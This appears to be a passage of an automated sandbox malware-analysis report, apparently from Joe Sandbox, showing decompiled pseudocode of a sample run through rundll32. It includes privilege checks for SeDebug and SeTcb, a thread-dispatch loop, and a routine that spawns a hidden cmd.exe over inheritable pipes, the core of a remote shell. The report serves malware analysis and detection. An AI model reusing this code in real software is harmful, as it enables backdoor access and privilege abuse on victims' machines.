                                                                                              								continue;
                                                                                              							}
                                                                                              							Sleep(0x7d0);
                                                                                              							_t64 =  &_v20;
                                                                                              							_v20 = 0;
                                                                                              							_t81 = E04269620(_t55,  &_v20, _t75, _t81, __eflags);
                                                                                              							__eflags = _t35;
                                                                                              							if(__eflags == 0) {
                                                                                              								continue;
                                                                                              							}
                                                                                              							_t71 = _v20;
                                                                                              							__eflags = _v20;
                                                                                              							if(__eflags == 0) {
                                                                                              								continue;
                                                                                              							}
                                                                                              							_t78 = E04269910(_t81, _t71, _t64);
                                                                                              							E04275B0F(_t81);
                                                                                              							_t88 = _t88 + 8;
                                                                                              							__eflags = _t78;
                                                                                              							if(__eflags == 0) {
                                                                                              								goto L24;
                                                                                              							}
                                                                                              							__eflags = WaitForSingleObject(_t78, 0xbb8) - 0x102;
                                                                                              							if(__eflags != 0) {
                                                                                              								goto L24;
                                                                                              							}
                                                                                              							CloseHandle(_t78);
                                                                                              							E042578B0(_t55, L"Dispatch", 0x2fffffff, CloseHandle, _t81, __eflags);
                                                                                              							do {
                                                                                              								_t41 = SetConsoleCtrlHandler(E0426AAF0, 0);
                                                                                              								__eflags = _t41;
                                                                                              							} while (_t41 != 0);
                                                                                              							_t82 = 0x315;
                                                                                              							goto L21;
                                                                                              						}
                                                                                              					}
                                                                                              					_t42 = E042694D0(WaitForSingleObject, L"Dispatch", CloseHandle, _t81, _t97);
                                                                                              					if(_t42 == 0) {
                                                                                              						goto L25;
                                                                                              					}
                                                                                              					while(_t42 != 0x2fffffff && _t42 != 0x1fffffff) {
                                                                                              						_t81 = OpenThread(0x1fffff, 0, _t42);
                                                                                              						if(_t81 == 0) {
                                                                                              							goto L25;
                                                                                              						}
                                                                                              						WaitForSingleObject(_t81, 0xffffffff);
                                                                                              						if(GetExitCodeThread(_t81,  &_v28) == 0) {
                                                                                              							L16:
                                                                                              							_t48 = E04269390(_t55,  &_v24, _t75, _t81, _t103, L"Dispatch");
                                                                                              							_t104 = _t48;
                                                                                              							if(_t48 != 0) {
                                                                                              								goto L25;
                                                                                              							}
                                                                                              							_t42 = E042694D0(_t55, L"Dispatch", _t75, _t81, _t104);
                                                                                              							_t105 = _t42;
                                                                                              							if(_t42 != 0) {
                                                                                              								continue;
                                                                                              							}
                                                                                              							goto L25;
                                                                                              						}
                                                                                              						_t103 = _v28 - 0x315;
                                                                                              						if(_v28 == 0x315) {
                                                                                              							goto L20;
                                                                                              						}
                                                                                              						goto L16;
                                                                                              					}
                                                                                              					E0426AAD0();
                                                                                              					goto L20;
                                                                                              				}
                                                                                              			}




























                                                                                              0x04269e66
                                                                                              0x04269e6f
                                                                                              0x04269e7b
                                                                                              0x04269e87
                                                                                              0x04269e93
                                                                                              0x04269e95
                                                                                              0x04269e9c
                                                                                              0x04269ea1
                                                                                              0x04269ea8
                                                                                              0x04269eaa
                                                                                              0x04269eaa
                                                                                              0x04269eb1
                                                                                              0x04269eb8
                                                                                              0x04269eb8
                                                                                              0x04269eba
                                                                                              0x04269ec2
                                                                                              0x04269ec9
                                                                                              0x04269ec9
                                                                                              0x04269ecb
                                                                                              0x04269ecd
                                                                                              0x04269ed4
                                                                                              0x04269ed4
                                                                                              0x04269edf
                                                                                              0x04269ee7
                                                                                              0x04269eef
                                                                                              0x04269ef9
                                                                                              0x04269eff
                                                                                              0x04269f90
                                                                                              0x04269f90
                                                                                              0x04269f90
                                                                                              0x00000000
                                                                                              0x04269f05
                                                                                              0x04269f05
                                                                                              0x04269f0a
                                                                                              0x04269f10
                                                                                              0x04269fae
                                                                                              0x04269fae
                                                                                              0x04269fb3
                                                                                              0x04269fb8
                                                                                              0x04269fba
                                                                                              0x04269fba
                                                                                              0x04269fbc
                                                                                              0x04269fbc
                                                                                              0x04269fc0
                                                                                              0x04269fcd
                                                                                              0x04269fd1
                                                                                              0x04269fa8
                                                                                              0x04269fa8
                                                                                              0x04269fae
                                                                                              0x04269fae
                                                                                              0x04269fb3
                                                                                              0x04269fb8
                                                                                              0x04269fba
                                                                                              0x04269fba
                                                                                              0x00000000
                                                                                              0x04269fba
                                                                                              0x04269fae
                                                                                              0x04269fd3
                                                                                              0x04269fd9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04269fe6
                                                                                              0x04269fe9
                                                                                              0x04269fee
                                                                                              0x04269ff4
                                                                                              0x04269ff9
                                                                                              0x0426a001
                                                                                              0x0426a003
                                                                                              0x0426a008
                                                                                              0x0426a00b
                                                                                              0x0426a00b
                                                                                              0x0426a008
                                                                                              0x04269fae
                                                                                              0x04269fae
                                                                                              0x04269fb3
                                                                                              0x04269fb8
                                                                                              0x04269fba
                                                                                              0x04269fba
                                                                                              0x00000000
                                                                                              0x04269fba
                                                                                              0x00000000
                                                                                              0x0426a00f
                                                                                              0x0426a00f
                                                                                              0x0426a014
                                                                                              0x0426a0f0
                                                                                              0x0426a0f7
                                                                                              0x0426a0f9
                                                                                              0x0426a0f9
                                                                                              0x0426a0fd
                                                                                              0x04269f92
                                                                                              0x04269f92
                                                                                              0x04269f96
                                                                                              0x04269f98
                                                                                              0x04269f9b
                                                                                              0x04269f9b
                                                                                              0x04269fa5
                                                                                              0x04269fa5
                                                                                              0x0426a01a
                                                                                              0x0426a01f
                                                                                              0x0426a0cb
                                                                                              0x0426a0cd
                                                                                              0x0426a0cf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426a0d8
                                                                                              0x0426a0db
                                                                                              0x00000000
                                                                                              0x0426a0db
                                                                                              0x0426a02a
                                                                                              0x0426a030
                                                                                              0x0426a034
                                                                                              0x0426a041
                                                                                              0x0426a043
                                                                                              0x0426a045
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426a04b
                                                                                              0x0426a04f
                                                                                              0x0426a051
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426a062
                                                                                              0x0426a065
                                                                                              0x0426a06a
                                                                                              0x0426a06d
                                                                                              0x0426a06f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426a07d
                                                                                              0x0426a082
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426a08f
                                                                                              0x0426a09b
                                                                                              0x0426a0a6
                                                                                              0x0426a0ad
                                                                                              0x0426a0af
                                                                                              0x0426a0af
                                                                                              0x0426a0b3
                                                                                              0x00000000
                                                                                              0x0426a0b3
                                                                                              0x04269fae
                                                                                              0x04269f1b
                                                                                              0x04269f22
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04269f28
                                                                                              0x04269f44
                                                                                              0x04269f48
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04269f4d
                                                                                              0x04269f5d
                                                                                              0x04269f69
                                                                                              0x04269f72
                                                                                              0x04269f77
                                                                                              0x04269f79
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04269f80
                                                                                              0x04269f85
                                                                                              0x04269f87
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04269f89
                                                                                              0x04269f5f
                                                                                              0x04269f67
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04269f67
                                                                                              0x04269f8b
                                                                                              0x00000000
                                                                                              0x04269f8b

                                                                                              APIs
                                                                                                • Part of subcall function 0426ADD0: GetCurrentProcess.KERNEL32(00000008,?), ref: 0426AE13
                                                                                                • Part of subcall function 0426ADD0: OpenProcessToken.ADVAPI32(00000000), ref: 0426AE1A
                                                                                                • Part of subcall function 0426ADD0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,00000000), ref: 0426AE2B
                                                                                                • Part of subcall function 0426ADD0: PrivilegeCheck.ADVAPI32(00000000,00000000,00000000), ref: 0426AE5D
                                                                                                • Part of subcall function 0426AC90: GetCurrentProcess.KERNEL32(00000028,?,00000000,00000000,?,?,04269E8E), ref: 0426ACAF
                                                                                                • Part of subcall function 0426AC90: OpenProcessToken.ADVAPI32(00000000,?,?,04269E8E), ref: 0426ACB6
                                                                                                • Part of subcall function 0426AC90: LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,04269E8E), ref: 0426ACE1
                                                                                                • Part of subcall function 0426AC90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,04269E8E), ref: 0426ACF6
                                                                                                • Part of subcall function 0426AC90: GetLastError.KERNEL32(?,?,04269E8E), ref: 0426ACFC
                                                                                                • Part of subcall function 0426AC90: CloseHandle.KERNEL32(?,?,?,04269E8E), ref: 0426AD0C
                                                                                              • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 04269EC9
                                                                                              • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 04269ED4
                                                                                              • OpenThread.KERNEL32(001FFFFF,00000000,00000000), ref: 04269F3E
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04269F4D
                                                                                              • GetExitCodeThread.KERNEL32(00000000,?), ref: 04269F55
                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000BB8,?,Dispatch,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 0426A001
                                                                                              • CloseHandle.KERNEL32(00000000,?,Dispatch,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 0426A00B
                                                                                              • Sleep.KERNEL32(000007D0), ref: 0426A02A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$OpenPrivilegeSleepToken$CloseCurrentHandleLookupObjectSingleThreadValueWait$AdjustCheckCodeErrorExitLastPrivileges
                                                                                              • String ID: Control$Dispatch$SeAssignPrimaryTokenPrivilege$SeDebugPrivilege$SeIncreaseQuotaPrivilege$SeTcbPrivilege
                                                                                              • API String ID: 1163877494-1245876370
                                                                                              • Opcode ID: 9281903462266fb1785395fd168efa27b1cab7c197d53c256b01927707b0b8dd
                                                                                              • Instruction ID: 80f867a6d6d6c5843b2ecd07514ebf48ddf688d0fbd33ac777468f514f9556f3
                                                                                              • Opcode Fuzzy Hash: 9281903462266fb1785395fd168efa27b1cab7c197d53c256b01927707b0b8dd
                                                                                              • Instruction Fuzzy Hash: BD51F8B17283129BE720BA689844B3B72959F81718F17061CE913A72D0EFF5FDC18696
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 80%
                                                                                              			E04263BE0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                              				signed int _v12;
                                                                                              				short _v536;
                                                                                              				char _v540;
                                                                                              				struct _SECURITY_ATTRIBUTES _v552;
                                                                                              				struct _PROCESS_INFORMATION _v568;
                                                                                              				struct _STARTUPINFOW _v640;
                                                                                              				signed int _t50;
                                                                                              				intOrPtr _t52;
                                                                                              				HANDLE* _t58;
                                                                                              				intOrPtr _t67;
                                                                                              				void* _t89;
                                                                                              				void* _t90;
                                                                                              				void* _t93;
                                                                                              				void* _t94;
                                                                                              				HANDLE* _t98;
                                                                                              				intOrPtr* _t106;
                                                                                              				HANDLE* _t108;
                                                                                              				signed int _t112;
                                                                                              
                                                                                              				_t50 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v12 = _t50 ^ _t112;
                                                                                              				_t52 = _a4;
                                                                                              				_t106 = __ecx;
                                                                                              				 *__ecx = 0x429e8b0;
                                                                                              				 *((intOrPtr*)(__ecx + 4)) = _t52;
                                                                                              				 *((intOrPtr*)(_t52 + 0x38)) = __ecx;
                                                                                              				 *(_t106 + 8) = CreateEventW(0, 1, 0, 0);
                                                                                              				asm("xorps xmm0, xmm0");
                                                                                              				 *_t106 = 0x429eda4;
                                                                                              				asm("movq [ebp-0x220], xmm0");
                                                                                              				E0427DEA0(_t106,  &_v640, 0, 0x44);
                                                                                              				asm("xorps xmm0, xmm0");
                                                                                              				asm("movups [ebp-0x234], xmm0");
                                                                                              				E0427DEA0(_t106,  &_v536, 0, 0x208);
                                                                                              				 *(_t106 + 0xc) = 0;
                                                                                              				 *(_t106 + 0x10) = 0;
                                                                                              				_t11 = _t106 + 0x18; // 0x42a78f0
                                                                                              				_t58 = _t11;
                                                                                              				 *(_t106 + 0x14) = 0;
                                                                                              				_t13 = _t106 + 0xc; // 0x42a78e4
                                                                                              				_t100 = _t13;
                                                                                              				 *_t58 = 0;
                                                                                              				_t14 = _t106 + 0x10; // 0x42a78e8
                                                                                              				_t108 = _t14;
                                                                                              				_v552.nLength = 0xc;
                                                                                              				_t16 = _t106 + 0x14; // 0x42a78ec
                                                                                              				_t98 = _t16;
                                                                                              				_v552.lpSecurityDescriptor = 0;
                                                                                              				_v552.bInheritHandle = 1;
                                                                                              				if(CreatePipe(_t13, _t58,  &_v552, 0) != 0) {
                                                                                              					if(CreatePipe(_t98, _t108,  &_v552, 0) != 0) {
                                                                                              						E0427DEA0(_t106,  &_v640, 0, 0x44);
                                                                                              						asm("xorps xmm0, xmm0");
                                                                                              						asm("movups [ebp-0x234], xmm0");
                                                                                              						GetStartupInfoW( &_v640);
                                                                                              						_v640.cb = 0x44;
                                                                                              						_v640.wShowWindow = 0;
                                                                                              						_v640.hStdInput =  *_t98;
                                                                                              						_t27 = _t106 + 0x18; // 0x0
                                                                                              						_t67 =  *_t27;
                                                                                              						_v640.hStdError = _t67;
                                                                                              						_v640.hStdOutput = _t67;
                                                                                              						_v640.dwFlags = 0x101;
                                                                                              						GetSystemDirectoryW( &_v536, 0x104);
                                                                                              						lstrcatW( &_v536, L"\\cmd.exe");
                                                                                              						if(CreateProcessW( &_v536, 0, 0, 0, 1, 0x20, 0, 0,  &_v640,  &_v568) != 0) {
                                                                                              							_t40 = _t106 + 4; // 0x0
                                                                                              							 *(_t106 + 0x1c) = _v568.hProcess;
                                                                                              							 *((intOrPtr*)(_t106 + 0x20)) = _v568.hThread;
                                                                                              							_v540 = 0x85;
                                                                                              							E04251C60( *_t40);
                                                                                              							_t46 = _t106 + 8; // 0x0
                                                                                              							WaitForSingleObject( *_t46, 0xffffffff);
                                                                                              							Sleep(0x96);
                                                                                              							 *((intOrPtr*)(_t106 + 0x24)) = E04265470(E04264000, _t106, 0,  &_v540, 1);
                                                                                              							 *((intOrPtr*)(_t106 + 0x28)) = E04265470(E04264100, _t106, 0, 0x3f, _t100);
                                                                                              						} else {
                                                                                              							_t36 = _t106 + 0xc; // 0x0
                                                                                              							CloseHandle( *_t36);
                                                                                              							_t37 = _t106 + 0x10; // 0x0
                                                                                              							CloseHandle( *_t37);
                                                                                              							CloseHandle( *_t98);
                                                                                              							_t38 = _t106 + 0x18; // 0x0
                                                                                              							CloseHandle( *_t38);
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t89 =  *_t108;
                                                                                              						if(_t89 != 0) {
                                                                                              							CloseHandle(_t89);
                                                                                              						}
                                                                                              						_t90 =  *_t98;
                                                                                              						if(_t90 != 0) {
                                                                                              							CloseHandle(_t90);
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t19 = _t106 + 0xc; // 0x0
                                                                                              					_t93 =  *_t19;
                                                                                              					if(_t93 != 0) {
                                                                                              						CloseHandle(_t93);
                                                                                              					}
                                                                                              					_t20 = _t106 + 0x18; // 0x0
                                                                                              					_t94 =  *_t20;
                                                                                              					if(_t94 != 0) {
                                                                                              						CloseHandle(_t94);
                                                                                              					}
                                                                                              				}
                                                                                              				return E04275AFE(_v12 ^ _t112);
                                                                                              			}





















                                                                                              0x04263be9
                                                                                              0x04263bf0
                                                                                              0x04263bf3
                                                                                              0x04263bfb
                                                                                              0x04263c03
                                                                                              0x04263c09
                                                                                              0x04263c0c
                                                                                              0x04263c17
                                                                                              0x04263c1a
                                                                                              0x04263c23
                                                                                              0x04263c2c
                                                                                              0x04263c34
                                                                                              0x04263c42
                                                                                              0x04263c45
                                                                                              0x04263c54
                                                                                              0x04263c5c
                                                                                              0x04263c69
                                                                                              0x04263c70
                                                                                              0x04263c70
                                                                                              0x04263c73
                                                                                              0x04263c7a
                                                                                              0x04263c7a
                                                                                              0x04263c7d
                                                                                              0x04263c87
                                                                                              0x04263c87
                                                                                              0x04263c8a
                                                                                              0x04263c94
                                                                                              0x04263c94
                                                                                              0x04263c97
                                                                                              0x04263ca2
                                                                                              0x04263cb4
                                                                                              0x04263cec
                                                                                              0x04263d1a
                                                                                              0x04263d28
                                                                                              0x04263d2b
                                                                                              0x04263d33
                                                                                              0x04263d3b
                                                                                              0x04263d45
                                                                                              0x04263d4e
                                                                                              0x04263d54
                                                                                              0x04263d54
                                                                                              0x04263d57
                                                                                              0x04263d5d
                                                                                              0x04263d6f
                                                                                              0x04263d79
                                                                                              0x04263d8b
                                                                                              0x04263dbc
                                                                                              0x04263de0
                                                                                              0x04263de3
                                                                                              0x04263dee
                                                                                              0x04263dfa
                                                                                              0x04263e01
                                                                                              0x04263e08
                                                                                              0x04263e0b
                                                                                              0x04263e16
                                                                                              0x04263e2f
                                                                                              0x04263e45
                                                                                              0x04263dbe
                                                                                              0x04263dbe
                                                                                              0x04263dc7
                                                                                              0x04263dc9
                                                                                              0x04263dcc
                                                                                              0x04263dd0
                                                                                              0x04263dd2
                                                                                              0x04263dd5
                                                                                              0x04263dd5
                                                                                              0x04263cee
                                                                                              0x04263cee
                                                                                              0x04263cf8
                                                                                              0x04263cfb
                                                                                              0x04263cfb
                                                                                              0x04263cfd
                                                                                              0x04263d01
                                                                                              0x04263d08
                                                                                              0x04263d08
                                                                                              0x04263d01
                                                                                              0x04263cb6
                                                                                              0x04263cb6
                                                                                              0x04263cb6
                                                                                              0x04263cc1
                                                                                              0x04263cc4
                                                                                              0x04263cc4
                                                                                              0x04263cc6
                                                                                              0x04263cc6
                                                                                              0x04263ccb
                                                                                              0x04263cd2
                                                                                              0x04263cd2
                                                                                              0x04263ccb
                                                                                              0x04263e5a

                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04263C0F
                                                                                              • CreatePipe.KERNEL32(042A78E4,042A78F0,?,00000000), ref: 04263CAC
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04263CC4
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04263CD2
                                                                                              • CreatePipe.KERNEL32(042A78EC,042A78E8,0000000C,00000000), ref: 04263CE4
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04263CFB
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04263D08
                                                                                              • GetStartupInfoW.KERNEL32(?), ref: 04263D33
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04263D79
                                                                                              • lstrcatW.KERNEL32(?,\cmd.exe), ref: 04263D8B
                                                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000020,00000000,00000000,00000044,?), ref: 04263DB4
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04263DC7
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04263DCC
                                                                                              • CloseHandle.KERNEL32(042A78EC), ref: 04263DD0
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04263DD5
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000001,0000003F), ref: 04263E0B
                                                                                              • Sleep.KERNEL32(00000096), ref: 04263E16
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$Create$Pipe$DirectoryEventInfoObjectProcessSingleSleepStartupSystemWaitlstrcat
                                                                                              • String ID: D$\cmd.exe
                                                                                              • API String ID: 3838570663-520541716
                                                                                              • Opcode ID: 0ab8397bda9ce5859750bd168744e156e07ecde5d768dae8d8866d993ea649a7
                                                                                              • Instruction ID: 253baf9ab3c3199808cce4024d533bb08bb4531994597e0f76b7b7fc9fa6df2e
                                                                                              • Opcode Fuzzy Hash: 0ab8397bda9ce5859750bd168744e156e07ecde5d768dae8d8866d993ea649a7
                                                                                              • Instruction Fuzzy Hash: 18618271B50219BBDB20EF64DC49F9AB7B8FF18710F100295A509E7180EB74BA94CFA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 24%
                                                                                              			E0426DCA0(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edi, short* _a4, intOrPtr _a8) {
                                                                                              				signed int _v12;
                                                                                              				signed int _v16;
                                                                                              				signed int _v20;
                                                                                              				LARGE_INTEGER* _v24;
                                                                                              				signed int _v28;
                                                                                              				_Unknown_base(*)()* _v32;
                                                                                              				intOrPtr* _v44;
                                                                                              				signed int _v56;
                                                                                              				_Unknown_base(*)()* _v76;
                                                                                              				void* __esi;
                                                                                              				short* _t89;
                                                                                              				signed int _t92;
                                                                                              				signed int _t94;
                                                                                              				signed int _t101;
                                                                                              				signed int _t109;
                                                                                              				signed int _t112;
                                                                                              				void* _t118;
                                                                                              				signed int _t120;
                                                                                              				signed int _t122;
                                                                                              				signed int _t127;
                                                                                              				signed int _t132;
                                                                                              				signed int _t133;
                                                                                              				signed int _t136;
                                                                                              				signed int _t137;
                                                                                              				signed int _t138;
                                                                                              				void** _t140;
                                                                                              				signed int _t141;
                                                                                              				signed int _t144;
                                                                                              				signed int _t145;
                                                                                              				long _t149;
                                                                                              				intOrPtr _t152;
                                                                                              				signed int _t156;
                                                                                              				LARGE_INTEGER* _t159;
                                                                                              				long _t160;
                                                                                              				LARGE_INTEGER* _t167;
                                                                                              				intOrPtr* _t169;
                                                                                              				LARGE_INTEGER* _t178;
                                                                                              				_Unknown_base(*)()* _t189;
                                                                                              				intOrPtr* _t191;
                                                                                              				intOrPtr* _t197;
                                                                                              				_Unknown_base(*)()* _t200;
                                                                                              				intOrPtr* _t203;
                                                                                              				signed int _t210;
                                                                                              				signed int _t212;
                                                                                              				signed int _t216;
                                                                                              				LARGE_INTEGER* _t217;
                                                                                              
                                                                                              				_t210 = _t216;
                                                                                              				_t189 = 0;
                                                                                              				_t197 = __ecx;
                                                                                              				if(_a8 == 0) {
                                                                                              					_t89 = _a4;
                                                                                              					__eflags =  *_t89 - 2;
                                                                                              					_t163 =  !=  ? 0x1c : 0x10;
                                                                                              					__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t89,  !=  ? 0x1c : 0x10);
                                                                                              					__eflags = _t89 - 0xffffffff;
                                                                                              					if(_t89 == 0xffffffff) {
                                                                                              						goto L14;
                                                                                              					} else {
                                                                                              						__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x23);
                                                                                              						__eflags = _t89 - 0xffffffff;
                                                                                              						if(_t89 == 0xffffffff) {
                                                                                              							goto L14;
                                                                                              						} else {
                                                                                              							 *(__ecx + 0x4c) = 1;
                                                                                              							 *(__ecx + 0x50) = 1;
                                                                                              							SetLastError(0);
                                                                                              							_t92 =  *((intOrPtr*)( *_t197 + 0x7c))();
                                                                                              							__eflags = _t92 - 2;
                                                                                              							if(_t92 != 2) {
                                                                                              								__imp__#19( *((intOrPtr*)(_t197 + 0x1c)), 0, 0, 0);
                                                                                              								__eflags = _t92 - 0xffffffff;
                                                                                              								if(_t92 != 0xffffffff) {
                                                                                              									goto L13;
                                                                                              								} else {
                                                                                              									__imp__#111();
                                                                                              									__eflags = _t92 - 0x2733;
                                                                                              									if(_t92 == 0x2733) {
                                                                                              										goto L13;
                                                                                              									} else {
                                                                                              										__eflags = _t92;
                                                                                              										if(_t92 != 0) {
                                                                                              											E04257AC0();
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											_t212 = _t216;
                                                                                              											_t217 = _t216 - 0x18;
                                                                                              											_t94 =  *0x42a4008; // 0xd33db39d
                                                                                              											_v56 = _t94 ^ _t212;
                                                                                              											_t191 = _v44;
                                                                                              											GetCurrentThreadId();
                                                                                              											 *((intOrPtr*)( *_t191 + 0xbc))(GetCurrentThreadId(), 0, _t197, __ebx, _t210, 0x80004005);
                                                                                              											__eflags =  *(_t191 + 0x38);
                                                                                              											_v76 = 1;
                                                                                              											if( *(_t191 + 0x38) <= 0) {
                                                                                              												L19:
                                                                                              												_t200 = 0;
                                                                                              												__eflags = 0;
                                                                                              											} else {
                                                                                              												__eflags =  *(_t191 + 0x3c);
                                                                                              												if( *(_t191 + 0x3c) <= 0) {
                                                                                              													goto L19;
                                                                                              												} else {
                                                                                              													_t200 = 1;
                                                                                              												}
                                                                                              											}
                                                                                              											_v16 = _t200;
                                                                                              											_t156 =  *((intOrPtr*)( *_t191 + 0xc4))();
                                                                                              											_t22 = _t200 + 4; // 0x5
                                                                                              											_t101 = _t22;
                                                                                              											_v20 = _t156;
                                                                                              											_v28 = _t101;
                                                                                              											__eflags = _t156;
                                                                                              											if(_t156 != 0) {
                                                                                              												_t101 = 1 + _t101;
                                                                                              												__eflags = _t101;
                                                                                              												_v28 = _t101;
                                                                                              											}
                                                                                              											E04291860();
                                                                                              											_t167 = _t217;
                                                                                              											_t201 = 0;
                                                                                              											_v24 = _t167;
                                                                                              											_t167->LowPart =  *(_t191 + 0x20);
                                                                                              											_t167->LowPart.HighPart =  *(_t191 + 0x174);
                                                                                              											 *((intOrPtr*)(_t167 + 8)) =  *((intOrPtr*)(_t191 + 0x178));
                                                                                              											 *((intOrPtr*)(_t167 + 0xc)) =  *((intOrPtr*)(_t191 + 0x17c));
                                                                                              											_t107 = 4;
                                                                                              											__eflags = _v16;
                                                                                              											if(__eflags == 0) {
                                                                                              												L25:
                                                                                              												__eflags = _t156;
                                                                                              												if(_t156 != 0) {
                                                                                              													 *(_t167 + _t107 * 4) = _t156;
                                                                                              												}
                                                                                              												_v20 =  *((intOrPtr*)(_t191 + 0x2c));
                                                                                              												_t109 =  *(_t191 + 0x5c);
                                                                                              												__eflags = _t109;
                                                                                              												if(_t109 != 0) {
                                                                                              													L0427ED17(_t109);
                                                                                              													_t217 =  &(_t217->LowPart.HighPart);
                                                                                              													 *(_t191 + 0x5c) = 0;
                                                                                              													 *(_t191 + 0x60) = 0;
                                                                                              													 *(_t191 + 0x64) = 0;
                                                                                              												}
                                                                                              												_t53 = _t191 + 0x5c; // 0x5d
                                                                                              												E0425ADA0(_t53, _v20, _t167, 0);
                                                                                              												_t169 = _t191;
                                                                                              												_t112 =  *((intOrPtr*)( *_t191 + 0x24))();
                                                                                              												__eflags = _t112;
                                                                                              												if(_t112 == 0) {
                                                                                              													L54:
                                                                                              													_t169 = _t191;
                                                                                              													 *((intOrPtr*)( *_t191 + 0xc0))(GetCurrentThreadId());
                                                                                              													__eflags = _v32;
                                                                                              													if(_v32 != 0) {
                                                                                              														_t169 = _t191;
                                                                                              														_t127 =  *((intOrPtr*)( *_t191 + 0x24))();
                                                                                              														__eflags = _t127;
                                                                                              														if(_t127 != 0) {
                                                                                              															_t169 = _t191;
                                                                                              															 *((intOrPtr*)( *_t191 + 4))();
                                                                                              														}
                                                                                              													}
                                                                                              													GetCurrentThreadId();
                                                                                              													__eflags = _t201;
                                                                                              													if(_t201 == 0) {
                                                                                              														L61:
                                                                                              														__eflags = _v12 ^ _t212;
                                                                                              														return E04275AFE(_v12 ^ _t212);
                                                                                              													} else {
                                                                                              														_t118 =  *_t201;
                                                                                              														__eflags = _t118;
                                                                                              														if(_t118 == 0) {
                                                                                              															L60:
                                                                                              															_push(4);
                                                                                              															E04275B47(_t201);
                                                                                              															goto L61;
                                                                                              														} else {
                                                                                              															_t120 = CloseHandle(_t118);
                                                                                              															__eflags = _t120;
                                                                                              															if(_t120 == 0) {
                                                                                              																goto L64;
                                                                                              															} else {
                                                                                              																goto L60;
                                                                                              															}
                                                                                              														}
                                                                                              													}
                                                                                              												} else {
                                                                                              													_t159 = _v24;
                                                                                              													do {
                                                                                              														__imp__WSAWaitForMultipleEvents(_v28, _t159, 0, 0xffffffff, 0);
                                                                                              														__eflags = _t112;
                                                                                              														if(_t112 != 0) {
                                                                                              															__eflags = _t112 - 1;
                                                                                              															if(_t112 != 1) {
                                                                                              																__eflags = _t112 - 2;
                                                                                              																if(_t112 == 2) {
                                                                                              																	_v32 = 0;
                                                                                              																	goto L54;
                                                                                              																} else {
